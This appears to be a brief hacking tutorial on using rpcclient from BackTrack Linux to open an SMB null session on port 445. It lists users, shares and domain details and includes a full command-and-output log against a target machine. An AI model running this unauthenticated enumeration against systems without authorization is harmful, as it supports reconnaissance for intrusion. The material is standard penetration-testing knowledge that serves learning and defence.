Linux
Rpcclient
I would like to start by saying that rpcclient is found on Linux, this is not a windows tool. For this tutorial and a lot of the others, I recommend downloading backtrack.
What is a null session?
A null session is a connection to a samba or smb server that does not require a password, eg.. Null session (no username or password to connect and enumerate the service).
Let's begin a very simple yet effective tutorial..
After verification that port 445 is open....
Open up terminal, and type rpcclient -U "" targetip, replacing target ip with your target machines ip address. It will come to a password prompt, just hit enter.
Since this is a null session attack, there is no username or password that should be used to connect. If the connection is successful, you should see a rpcclient prompt like this:
rpcclient $>
Now type in enumdomusers, this will dump a list of user accounts that are present on the share like so:
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[gh0s7] rid:[0x3e8]
Yes enumerating user accounts through open samba or smb is that simple. There are many more options that can be used with this program, if you type help at the rpcclient prompt you will see all of the options. There are a few different commands that I used to create the log file for this tutorial.
1)enumdomusers
2)netshareenum
3)netshareenumall
4)querydominfo
****Append Log File****
/*NULL SESSION CONNECTION*/
root@bt:~# rpcclient -U "" 192.168.1.12
Enter 's password:
/*ENUMERATING USERS*/
rpcclient $> enumdomusers
user:[nobody] rid:[0x1f5]
user:[gh0s7] rid:[0x3e8]
/*FINDING NETWORK SHARE INFO ON THE LOCAL MACHINE*/
rpcclient $> netshareenum
netname: test
remark:
path: C:\media\Gh0$7\test
password:
/*OR*/
rpcclient $> netshareenumall
netname: IPC$
remark: IPC Service (gh0s7-serverhome server (Samba, Ubuntu))
path: C:\tmp
password:
netname: test
remark:
path: C:\media\Gh0$7\test
password:
netname: print$
remark: Printer Drivers
path: C:\var\lib\samba\printers
password:
/*QUERYING SERVER INFO (NAME AND DOMAIN)*/
rpcclient $> querydominfo
Domain: MSHOME
Server: GH0S7-SERVERHOME
Comment: gh0s7-serverhome server (Samba, Ubuntu)
Total Users: 2
Total Groups: 0
Total Aliases: 0
Sequence No: 1321411072
Force Logoff: -1
Domain Server State: 0x1
Server Role: ROLE_DOMAIN_PDC
Unknown 3: 0x1